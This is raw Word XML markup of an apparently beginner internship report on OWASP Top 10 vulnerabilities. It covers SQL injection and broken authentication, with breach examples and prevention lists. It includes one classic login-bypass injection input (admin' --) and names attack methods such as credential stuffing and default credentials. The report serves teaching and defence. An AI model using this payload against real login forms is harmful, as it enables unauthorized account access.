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b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Application Security Research Report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1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Aaisha Baig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Researcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Program</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">VortexTech Cybersecurity Internship 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Track</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Beginner — Week 1 of 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Top 10 Vulnerability Research</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Submission Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2 July 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A5F" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="E8F0F8" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Internship Submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This document presents research on five critical web application vulnerabilities from the OWASP Top 10 list, including real-world breach examples, attacker exploitation methods, and developer prevention strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Introduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Open Web Application Security Project (OWASP) is a globally recognized non-profit organization dedicated to improving software security. The OWASP Top 10 is an industry-standard list of the most critical web application security risks, updated periodically based on real-world data from security experts worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding these vulnerabilities is essential for any cybersecurity professional. This report covers five of the most impactful vulnerabilities from the OWASP Top 10 (2021 edition), explaining each in plain language, how attackers exploit them, documented real-world breach examples, and practical prevention strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Vulnerability Research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 1: Injection (SQL Injection) — A03:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection (SQLi) is a vulnerability where an attacker is able to insert malicious SQL code into a query that an application sends to its database. Because the application does not properly separate user input from the actual SQL command, the database executes the attacker's code as if it were a legitimate instruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it like this: imagine you ask a librarian to find a book by writing your request on a form. A SQL injection attacker writes extra instructions on the form that trick the librarian into revealing all books in the entire library — or even deleting them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Does an Attacker Exploit It?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker identifies an input field (login form, search box, URL parameter) and enters specially crafted SQL syntax instead of normal text. For example, in a login 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Pr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="80"/>
              <w:ind w:left="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Username: admin' --</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="40"/>
              <w:ind w:left="200"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00FF00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Password: anything</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The ' character closes the SQL string, and -- comments out the rest of the query, bypassing the password check entirely. The attacker gains admin access without knowing the real password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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40"/>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2E6DA4" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="FDECEA" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Heartland Payment Systems (2008) — SQL injection attack compromised over 130 million credit and debit card numbers, making it one of the largest data breaches in history at that time. The attacker used SQL injection to install malicious software on Heartland's payment processing network.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention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Use parameterized queries (prepared statements) — these separate SQL code from user data completely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement an ORM (Object Relational Mapper) like Sequelize or Django ORM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate and sanitize all user input on the server side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the principle of least privilege — database accounts should only have permissions they need</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable a Web Application Firewall (WAF) to detect and block injection attempts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 2: Broken Authentication — A07:2021</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What is it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Broken Authentication refers to weaknesses in how a web application verifies the identity of its users. When authentication mechanisms are poorly implemented, attackers can impersonate legitimate users, take over accounts, and gain unauthorized access to sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Imagine your house key is so simple that any similar key can open your lock — that is essentially what broken authentication is in the digital world.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How Does an Attacker Exploit It?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers exploit weak authentication through several methods:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Credential stuffing — using lists of stolen username/password pairs from other breaches to try logging in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Brute force attacks — systematically trying every possible password combination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Session token theft — stealing the unique token given to a user after login to impersonate them</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Default credentials — trying factory-set usernames and passwords (admin/admin, admin/password)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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40"/>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2E6DA4" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7920"/>
            <w:shd w:fill="FDECEA" w:color="auto" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100" w:before="100"/>
              <w:ind w:left="120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LinkedIn (2012) — 6.5 million (later revealed to be 117 million) user passwords were stolen and cracked due to weak password hashing (unsalted MD5). Attackers cracked most passwords within days because the hashing was improperly implemented.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention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Implement Multi-Factor Authentication (MFA) on all accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Use secure, salted password hashing algorithms like bcrypt, Argon2, or PBKDF2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce strong password policies and prevent use of commonly known passwords</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">✅ </w:t>
